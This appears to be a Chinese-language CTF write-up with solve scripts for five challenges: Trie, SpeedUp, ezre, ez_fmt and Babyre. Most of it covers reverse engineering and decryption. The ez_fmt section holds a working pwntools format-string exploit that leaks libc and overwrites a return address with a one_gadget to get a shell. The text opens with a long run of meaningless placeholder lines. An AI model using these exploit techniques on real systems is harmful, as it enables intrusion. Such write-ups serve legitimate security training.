Z()
O()
T()
Z()
T()
Z()
T()
O()
Z()
T()
O()
O()
Z()
Z()
O()
O()
O()
T()
T()
T()
Z()
Z()
O()
T()
Z()
Z()
T()
T()
O()
O()
Z()
O()
T()
Z()
O()
Z()
O()
Z()
T()
O()
T()
T()
Z()
T()
O()
Z()
Z()
T()
T()
O()
O()
Z()
O()
Z()
O()
T()
Z()
T()
Z()
T()
O()
Z()
T()
O()
Z()
Z()
O()
O()
O()
T()
T()
O()
Z()
O()
T()
T()
Z()
O()
T()
Z()
O()
T()
# Read the service's response
b=p.recv()
# Decode the reply bytes as UTF-8 text
decoded_string4 = b.decode('utf-8')
print(decoded_string4)
# Send one more move and print the reply
p.sendline(b'2')
a=p.recv()
decoded_string = a.decode('utf-8')
print(decoded_string)
Trie
? 題目讓我想到Trie樹。逆向觀察后的大致思路就是利用Trie樹的特性,通過發送特定的IP地址來觸發服務器端的某種漏洞,然后從服務器的響應中提取出敏感信息。
? 根據(jù)思路調(diào)整,最后exp:
from pwn import *
# context.log_level = "debug"
# pwntools settings: split a tmux pane for gdb, target is Linux/amd64.
context.terminal = ["/bin/tmux", "sp", "-h"]
context.arch = 'amd64'
context.os = 'linux'
# Accumulates the decoded next-hop text across retrieve_flag() calls.
flag = ''
def add(sh, data):
    """Menu option 1: insert a route whose destination and next hop are both `data`."""
    steps = (
        ("4. Quit.", "1"),
        ("destination IP:", data),
        ("next hop:", data),
    )
    for prompt, answer in steps:
        sh.sendlineafter(prompt, answer)
def show(sh, data):
    """Menu option 2: look up `data` and return the reported next hop as text.

    The service prints the next hop in dotted-decimal form; the octets are
    reversed and each one is mapped to its character code by tostring().
    """
    sh.sendlineafter("4. Quit.", "2")
    sh.sendlineafter("destination IP:", data)
    sh.recvuntil("The next hop is ")
    raw_hop = sh.recvuntil('\n', drop=True).decode('utf-8')
    octets = raw_hop.split('.')
    octets.reverse()
    return tostring(octets)
def get_flag(sh):
    """Menu option 3 (the service's own "flag" action); nothing is read back here."""
    prompt, choice = "4. Quit.", "3"
    sh.sendlineafter(prompt, choice)
def tostring(t_flag):
    """Map each decimal string in `t_flag` to the character with that code point and join them."""
    chars = [chr(int(piece, 10)) for piece in t_flag]
    return ''.join(chars)
def padding():
    """Open a new session and insert two filler routes; returns the tube (caller owns it)."""
    sh = remote("47.104.150.173", 1337)
    for filler in ("1.2.3.4", "2.3.4.5"):
        add(sh, filler)
    return sh
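def retrieve_flag(ip):
    """Open a fresh session, insert `ip`, run option 3 and append the decoded
    next hop for `ip` to the module-level `flag`, printing the running value.

    Fix: the original never closed the tube returned by padding(), leaking one
    socket per call; the session is now closed on every path.
    """
    global flag
    sh = padding()
    try:
        add(sh, ip)
        get_flag(sh)
        flag += show(sh, ip)
    finally:
        sh.close()
    print(flag)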
def main():
    """Query each address in turn; every call appends to the global `flag`."""
    ips = (
        "129.2.3.4",
        "193.2.3.4",
        "225.2.3.4",
        "241.2.3.4",
        "249.2.3.4",
        "253.2.3.4",
        "255.2.3.4",
        "254.2.3.4",
        "254.130.3.4",
        "254.194.3.4",
    )
    for ip in ips:
        retrieve_flag(ip)
# Script entry point; importing the module does not start the session.
if __name__ == "__main__":
main()
SpeedUp
我們先看一下題目:
x = ( 2 27 ) ! x=(2^{27})! x=(227)!
def f(x):
    """Sum of the decimal digits of the non-negative integer x.

    For a negative x the loop never reaches zero (floor division keeps the
    value at -1), so only non-negative inputs terminate.
    """
    total = 0
    while x:
        x, digit = divmod(x, 10)
        total += digit
    return total
? 意思是求2的27次方的階乘所獲得的每一位數(shù)字之和。
? 當(dāng)時想的是直接手搓,但又不大可能,后來在網(wǎng)上找了好久發(fā)現(xiàn)在OEIS
直接記錄了:https://oeis.org/A244060
? 然后看他的list:
import hashlib
# Digit sum of (2^27)! as listed in OEIS A244060; the flag is its SHA-256.
n = 4495662081
n_str = str(n)
# hashlib.sha256() accepts the initial data directly, so no separate update().
sha256_hash = hashlib.sha256(n_str.encode('utf-8'))
hash_value = sha256_hash.hexdigest()
print(f"flag{{{hash_value}}}")
flag{bbdee5c548fddfc76617c562952a3a3b03d423985c095521a8661d248fad3797}
ezre
? 一眼看到main
函數(shù):
/*
 * IDA pseudocode of the binary's main() — not compilable as-is.
 * Control flow is flattened: v16 is the state id, and every while arm / switch
 * case performs one step and writes the next state into v16.  What the listing
 * shows: input is read with scanf("%s") into the 52-byte buffer s with no
 * width limit (an over-long line overruns the stack frame), its length must be
 * exactly 34, and the remaining states transform the input and compare it
 * byte by byte against byte_406180.  "right!" is printed only from the
 * default arm, i.e. once no other state is pending.
 */
__int64 __fastcall main(int a1, char **a2, char **a3)
{
int v3; // eax
unsigned int v4; // eax
int v5; // eax
size_t v6; // rax
int v7; // edx
unsigned int v8; // eax
int v9; // eax
int v10; // eax
int v11; // eax
size_t v12; // rax
int v13; // ecx
int v14; // eax
int v16; // [rsp+128h] [rbp-118h]
int v17; // [rsp+12Ch] [rbp-114h]
int v18; // [rsp+130h] [rbp-110h]
int v19; // [rsp+134h] [rbp-10Ch]
int v20; // [rsp+138h] [rbp-108h]
int v21; // [rsp+13Ch] [rbp-104h]
char v22[64]; // [rsp+140h] [rbp-100h] BYREF
char v23[64]; // [rsp+180h] [rbp-C0h] BYREF
char v24[64]; // [rsp+1C0h] [rbp-80h] BYREF
char s[52]; // [rsp+200h] [rbp-40h] BYREF
unsigned int v26; // [rsp+234h] [rbp-Ch]
size_t v27; // [rsp+238h] [rbp-8h]
v26 = 0;
printf("Welcome to the CTF world:");
memset(s, 0, 0x32uLL);
// Unbounded read: "%s" has no field width, so input longer than s overflows.
__isoc99_scanf("%s", s);
v27 = strlen(s);
// Initial state of the flattened dispatcher.
v16 = 1111065332;
// Nested whiles dispatch the negative state ids; the switch below the rest.
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( v16 == -1884415306 )
v16 = 874394363;
if ( v16 != -1610796817 )
break;
// Outer round counter v21: four passes, then on to the byte transforms.
v5 = 951531691;
if ( v21 < 4 )
v5 = -123677562;
v16 = v5;
}
if ( v16 != -1571665377 )
break;
// Odd pass: sub_401980 rewrites v22 via v23, then v23 is copied back.
v8 = strlen(v22);
sub_401980(v22, v23, v8);
memset(v22, 0, 0x32uLL);
memcpy(v22, v23, 0x32uLL);
v16 = -1884415306;
}
if ( v16 != -1125271585 )
break;
v16 = 502592025;
}
if ( v16 != -1034568323 )
break;
++v17;
v16 = 359215778;
}
if ( v16 != -728174227 )
break;
// Any byte mismatch ends here.
printf("wrong!");
v26 = 0;
v16 = -88181297;
}
if ( v16 == -139558179 )
{
// Wrong input length.
printf("Wrong!");
exit(-1);
}
if ( v16 != -123677562 )
break;
// Per-pass step: seed rand() from byte_406132 and run sub_401D10 over the
// global buffer; even passes go to 1367925527, odd ones to -1571665377.
srand(byte_406132);
v6 = strlen((const char *)(unsigned int)byte_406130);
sub_401D10(byte_406130, v6);
v7 = 1367925527;
if ( (v21 & 1) != 0 )
v7 = -1571665377;
v16 = v7;
}
if ( v16 == -88181297 )
break;
switch ( v16 )
{
case 178472351:
sub_402EE0(byte_406130, &byte_406130[v20]);
v19 = 0;
v16 = 244862061;
break;
case 201400792:
v16 = -1034568323;
break;
case 244862061:
v10 = 1368236239;
if ( v19 < v20 )
v10 = 1736470037;
v16 = v10;
break;
case 282724921:
// First state after the length check: transform s into v22.
v4 = strlen(s);
v21 = 0;
v16 = -1610796817;
sub_401980(s, v22, v4);
break;
case 359215778:
// Compare loop guard: v17 indexes v24 / byte_406180 up to strlen(v23).
v12 = strlen(v23);
v13 = 2026466323;
if ( v17 < v12 )
v13 = 1003071928;
v16 = v13;
break;
case 384994120:
v11 = -1125271585;
if ( v18 < v20 )
v11 = 1105882884;
v16 = v11;
break;
case 502592025:
// Final transform v23 -> v24, then start the byte-wise comparison.
sub_401EB0(v23, v24);
v17 = 0;
v16 = 359215778;
break;
case 728190549:
v18 = 0;
v16 = 384994120;
break;
case 874394363:
++v21;
v16 = -1610796817;
break;
case 951531691:
// v20 = 64 bytes of the global buffer; dword_4062C0 selects which of the
// two per-byte transforms below is applied.
v9 = 728190549;
v20 = 64;
if ( dword_4062C0 == 1 )
v9 = 178472351;
v16 = v9;
break;
case 1003071928:
// Mismatch against the target table -> "wrong!" state.
v14 = 201400792;
if ( byte_406180[v17] != v24[v17] )
v14 = -728174227;
v16 = v14;
break;
case 1105882884:
// Transform B: b ^= 0x27.
byte_406130[v18] ^= 0x27u;
v16 = 1837459842;
break;
case 1111065332:
// Entry state: input length must be exactly 34.
v3 = 282724921;
if ( v27 != 34 )
v3 = -139558179;
v16 = v3;
break;
case 1367925527:
// Even pass: sub_401250 rewrites v22 via v23, then v23 is copied back.
sub_401250(v22, v23);
memset(v22, 0, 0x32uLL);
memcpy(v22, v23, 0x32uLL);
v16 = -1884415306;
break;
case 1368236239:
v16 = 502592025;
break;
case 1558803342:
++v19;
v16 = 244862061;
break;
case 1736470037:
// Transform A: b = (5 * (b + 3)) ^ 0x15.
byte_406130[v19] = (5 * (byte_406130[v19] + 3)) ^ 0x15;
v16 = 1558803342;
break;
case 1837459842:
++v18;
v16 = 384994120;
break;
default:
// Reached when every compared byte matched.
printf("right!");
v26 = 0;
v16 = -88181297;
break;
}
}
return v26;
}
? 接收用戶輸入的字符串,并對其進行一系列復雜的操作和檢查。這些操作和檢查是通過一個嵌套的while循環和switch語句實現的,這個循環和語句的控制流程由一個狀態變量v16控制。
? 在這個循環和語句中,根據v16的值,程序會執行不同的操作,包括調用一些未在這段代碼中定義的函數(如sub_401980、sub_401D10等)、改變v16的值、改變其他變量的值等。
? 然后在這找加密方式找了好久,后來無意中發(fā)現(xiàn)了這個
? 先去除平坦混淆(https://github.com/cq674350529/deflat),然后分析加密:
? 先base然后異或,提取字符解:
from z3 import Solver, BitVec, sat
# One 8-bit symbolic variable per byte; the solver recovers the 48 input bytes
# that reproduce `cmp` after the transform replayed below.
s = Solver()
needdd = [BitVec(str(i), 8) for i in range(48)]
# Target bytes the binary compares against.
cmp = [
    0x3A, 0x2C, 0x4B, 0x51, 0x68, 0x46, 0x59, 0x63, 0x24, 0x04, 0x5E, 0x5F,
    0x00, 0x0C, 0x2B, 0x03, 0x29, 0x5C, 0x74, 0x70, 0x6A, 0x62, 0x7F, 0x3D,
    0x2C, 0x4E, 0x6F, 0x13, 0x06, 0x0D, 0x06, 0x0C, 0x4D, 0x56, 0x0F, 0x28,
    0x4D, 0x51, 0x76, 0x70, 0x2B, 0x05, 0x51, 0x68, 0x48, 0x55, 0x24, 0x19,
]
# XOR table (21 entries) indexed through the rolling counter v7.
table = [
    0x53, 0x46, 0x4E, 0x72, 0x49, 0x42, 0x6D, 0x6E, 0x4F, 0x4C, 0x10, 0x56,
    0x74, 0x7E, 0x62, 0x4D, 0x63, 0x16, 0x6C, 0x4A, 0x1E,
]
# Counter seed used by the binary.
v7 = 2023
# Replay the binary's transform symbolically: byte i is XORed with a table
# entry chosen by the rolling counter v7 (step, modulus and offset depend on
# i mod 3), then folded into byte i+1.  Operand order is kept as in the
# original so z3 sees identical terms.
for i in range(47):
    step, modulus, offset = ((3, 17, 3), (5, 20, 1), (7, 19, 2))[i % 3]
    v7 = (v7 + step) % modulus
    v3 = table[v7 + offset]
    needdd[i] = needdd[i] ^ v3
    v4 = needdd[i]
    needdd[i + 1] = v4 ^ needdd[i + 1]
# Pin every symbolic byte to the expected value and ask z3 for a model.
for position, expected in enumerate(cmp):
    s.add(expected == needdd[position])
if s.check() == sat:
    # Satisfiable: print the assignment (variables are named by index).
    model = s.model()
    print(model)
? 輸出:
[26 = 76,
8 = 87,
0 = 87,
33 = 82,
34 = 55,
44 = 110,
42 = 68,
2 = 113,
12 = 79,
3 = 83,
16 = 102,
28 = 107,
38 = 55,
14 = 105,
27 = 108,
29 = 69,
22 = 83,
9 = 66,
43 = 71,
11 = 108,
1 = 90,
25 = 116,
19 = 106,
24 = 115,
4 = 87,
18 = 97,
20 = 87,
31 = 70,
45 = 112,
32 = 87,
46 = 61,
30 = 102,
13 = 114,
17 = 99,
10 = 76,
36 = 47,
15 = 69,
21 = 66,
7 = 116,
23 = 82,
39 = 100,
35 = 106,
5 = 99,
47 = 61,
40 = 77,
41 = 67,
37 = 82,
6 = 85]
? 變異base64按順序加解密:
l+USN4J5Rfj0TaVOcnzXiPGZIBpoAExuQtHyKD692hwmqe7/Mgk8v1sdCW3bYFLr
FGseVD3ibtHWR1czhLnUfJK6SEZ2OyPAIpQoqgY0w49u+7rad5CxljMXvNTBkm/8
Hc0xwuZmy3DpQnSgj2LhUtrlVvNYks+BX/MOoETaKqR4eb9WF8ICGzf6id1P75JA
pnHQwlAveo4DhGg1jE3SsIqJ2mrzxCiNb+Mf0YVd5L8c97/WkOTtuKFZyRBUPX6a
plxXOZtaiUneJIhk7qSYEjD1Km94o0FTu52VQgNL3vCBH8zsA/b+dycGPRMwWfr6
? 解密:
import base64
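def custom_b64decode(s, custom_alphabet):
    """Decode `s`, written with a permuted base64 alphabet, to bytes.

    `custom_alphabet` is a 64-character string whose i-th character stands
    for the value i; it is mapped onto the standard alphabet and the result
    is handed to the standard decoder.  Missing '=' padding is added.

    Fix: the original computed `4 - len % 4`, which is 4 when the length is
    already a multiple of 4 and so appended a spurious "====".  The padding
    length is now (-len) % 4, i.e. 0, 1, 2 or 3.

    Raises binascii.Error (from base64.b64decode) if the translated text is
    not valid base64.
    """
    standard_alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
    translation_table = str.maketrans(custom_alphabet, standard_alphabet)
    standard_b64encoded = s.translate(translation_table)
    standard_b64encoded += '=' * ((-len(standard_b64encoded)) % 4)
    return base64.b64decode(standard_b64encoded)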
# Permuted base64 alphabet recovered from the binary.
custom_alphabet = 'l+USN4J5Rfj0TaVOcnzXiPGZIBpoAExuQtHyKD692hwmqe7/Mgk8v1sdCW3bYFLr'
# Text to decode.
encoded_string = 'B6gtBdq8BGN1VX+yIdECBGt9a8N1TyIvB9hCo9hDA543uc'
decoded_bytes = custom_b64decode(encoded_string, custom_alphabet)
decoded_string = str(decoded_bytes, 'utf-8')
print(decoded_string)
flag{3ea590ccwxehg715264fzxnzepqz}
ez_fmt
? 給定了輸入的堆棧地址和格式化字符串漏洞,我們可以修改任何地址。但是,程序執行完畢后,w會被設置為0,這使得下一次利用變得更加困難。因此,我們需要在w被設置為0之前進行操作。
? 我們可以修改printf的返回地址。同時,由于printf函數需要堆棧對齊,所以返回地址應該被設置為0x4011ED。此外,我們還需要泄露出libc地址,以便進行第二次利用,將函數的返回地址修改為one_gadget。
from pwn import *
# 設(shè)置pwntools的上下文環(huán)境為Linux amd64
context(os='linux', arch='amd64', log_level='debug')
#p = process('./ez_fmt')
p = remote('47.104.24.40', 1337)
# 加載本地的二進(jìn)制文件和libc文件
elf = ELF('./ez_fmt')
libc = ELF('./libc-2.31.so')
# 接收直到遇到"0x",然后讀取12個字符,轉(zhuǎn)換為棧地址
p.recvuntil("0x")
stack=int(p.recv(12),16)
print(hex(stack))
# 構(gòu)造payload,用于修改棧上的值
pay=b'%4589c%11$hn%19$p'.ljust(0x28,b'\x00')+p64(stack-8)
p.send(pay)
# 再次接收直到"0x",讀取12個字符,計算libc基地址
p.recvuntil("0x")
libc_base=int(p.recv(12),16)-libc.sym['__libc_start_main']-243
print(hex(libc_base))
# 計算one_gadget的地址
one_gadget=libc_base+0xe3b01
p.recvuntil("\n")
# 計算one_gadget的低16位
one_gadget_low = one_gadget&0xffff
# 計算one_gadget的高16位
one_gadget_high = (one_gadget>>16)&0xffff
# 構(gòu)造格式化字符串,用于寫入one_gadget的低16位
fmt_low = b'%'+str(one_gadget_low).encode()+b'c%10$hn'
# 構(gòu)造格式化字符串,用于寫入one_gadget的高16位
fmt_high = b'%'+str(((one_gadget>>16)&0xffff)-(one_gadget_low)).encode()+b'c%11$hn'
# 將兩個格式化字符串連接起來,然后用'\x00'填充到0x20字節(jié)
fmt_str = (fmt_low+fmt_high).ljust(0x20,b'\x00')
# 計算要寫入的內(nèi)存地址
addr_low = p64(stack+0x68)
addr_high = p64(stack+0x68 + 2)
# 構(gòu)造最終payload
pay=fmt_str+addr_low+addr_high
p.send(pay)
p.interactive()
Babyre
發(fā)現(xiàn)有TLS
// TLS callback (IDA pseudocode, not compilable as-is).  Two things are visible:
// an anti-debug check on PEB->BeingDebugged, and — when a2 is odd — an in-place
// XOR pass over 32 bytes of the table at off_14001E060.
// NOTE(review): a2 is presumably the TLS reason code (1 = DLL_PROCESS_ATTACH,
// 3 = DLL_THREAD_DETACH are the odd values) — confirm against the callback
// signature.
__int64 __fastcall TlsCallback_1_0(__int64 a1, char a2)
{
__int64 v2; // rcx
struct _PEB *v3; // rax
__int64 result; // rax
int i; // [rsp+44h] [rbp+24h]
sub_14001138E(&unk_1400240F4);
v3 = NtCurrentPeb();
LOBYTE(v3) = v3->BeingDebugged;
// Debugger attached: the flag is handed to sub_140011AE0 (body not shown here).
if ( (_BYTE)v3 == 1 )
{
LOBYTE(v2) = v3->BeingDebugged;
sub_140011AE0(v2);
}
result = a2 & 1;
if ( (a2 & 1) != 0 )
{
// Decode step: table byte i+1 is XORed with its index i, for i = 0..31.
for ( i = 0; i < 32; ++i )
{
*((_BYTE *)off_14001E060 + i + 1) ^= i;
result = (unsigned int)(i + 1);
}
}
return result;
}
// Input handler (IDA pseudocode, not compilable as-is).  Reads up to 32
// characters with getline(Str, 33), requires strlen == 32, runs the transform
// chain sub_140011019 -> 4 x sub_14001106E -> sub_140011087 into
// byte_14001E218 and compares its 32 bytes with byte_14001E040.
__int64 sub_140012050()
{
char *v0; // rdi
__int64 i; // rcx
char v3[32]; // [rsp+0h] [rbp-20h] BYREF
char v4; // [rsp+20h] [rbp+0h] BYREF
_DWORD v5[15]; // [rsp+28h] [rbp+8h] BYREF
int j; // [rsp+64h] [rbp+44h]
int k; // [rsp+84h] [rbp+64h]
v0 = &v4;
// Fills 34 dwords with 0xCCCCCCCC (-858993460): looks like MSVC debug-build
// stack poisoning, not program logic — confirm.
for ( i = 34i64; i; --i )
{
*(_DWORD *)v0 = -858993460;
v0 += 4;
}
sub_14001138E((__int64)&unk_1400240F4);
sub_1400111A9((__int64)&unk_14001AD78);
sub_14001123F(aPleaseInputYou);
std::istream::getline(std::cin, Str, 33i64);
if ( j_strlen(Str) == 32 )
{
memset(v5, 0, 0x20ui64);
// Str is packed into v5 (8 dwords), then sub_14001106E is applied to the four
// dword pairs (v5[2j], v5[2j+1]) — consistent with a 64-bit block cipher such
// as the TEA-style routine in the solve script below — TODO confirm.
sub_140011019((__int64)v5, (__int64)Str);
for ( j = 0; j < 4; ++j )
sub_14001106E(&v5[2 * j], &v5[2 * j + 1]);
sub_140011087((__int64)v5, (__int64)byte_14001E218);
// Byte-wise comparison against the expected table; first mismatch fails.
for ( k = 0; k < 32; ++k )
{
if ( byte_14001E040[k] != byte_14001E218[k] )
{
sub_14001123F(aNoNoNo);
sub_1400111A9((__int64)"%d");
goto LABEL_15;
}
}
sub_14001123F(aYes);
}
else
{
sub_1400111A9((__int64)"Wrong Length!");
}
LABEL_15:
sub_140011325(v3, &unk_14001AD30);
return 0i64;
}
? 最后exp:
#include<stdio.h>
#include<stdint.h>
/*
 * Decrypt one 64-bit block in place with the binary's modified TEA/XTEA-style
 * Feistel routine.
 *
 * v   - two 32-bit words, overwritten with the plaintext words.
 * key - four 32-bit key words, selected per half-round by bits of `sum`.
 *
 * The schedule runs 4 x 33 = 132 rounds (not 32 as the original comment
 * said); each round subtracts `delta` from `sum` and undoes the two
 * half-rounds.  The shifts (<< 5, >> 4) and the extra `^ sum` on the first
 * word are what distinguish it from textbook XTEA.
 */
void decrypt(uint32_t v[2], uint32_t const key[4])
{
    const uint32_t delta = 0x88408067;
    uint32_t sum = 0xd192c263;
    uint32_t a = v[0];
    uint32_t b = v[1];

    for (unsigned round = 0; round < 4u * 33u; round++) {
        sum -= delta;
        b -= (((a << 5) ^ (a >> 4)) + a) ^ (sum + key[(sum >> 11) & 3]);
        a -= (((b << 5) ^ (b >> 4)) + b) ^ (sum + key[sum & 3]) ^ sum;
    }

    v[0] = a;
    v[1] = b;
}
int main()
{
    /* Four 64-bit ciphertext blocks stored as consecutive uint32 pairs. */
    uint32_t array[8] = {0x9523F2E0, 0x8ED8C293, 0x8668C393, 0xDDF250BC,
                         0x510E4499, 0x8C60BD44, 0x34DCABF2, 0xC10FD260};
    /* Key words are the ASCII codes of 'b', 'o', 'm', 'b'. */
    uint32_t key[4] = {0x62, 0x6F, 0x6D, 0x62};

    for (int block = 0; block < 8; block += 2) {
        uint32_t pair[2] = {array[block], array[block + 1]};
        decrypt(pair, key);
        /* Emit both words byte by byte, least significant byte first. */
        for (int pos = 0; pos < 8; pos++) {
            uint32_t word = pair[pos / 4];
            putchar((char)(word >> (8 * (pos % 4))));
        }
    }
    return 0;
}
flag{W31com3_2_Th3_QwbS7_4nd_H4v3_Fun}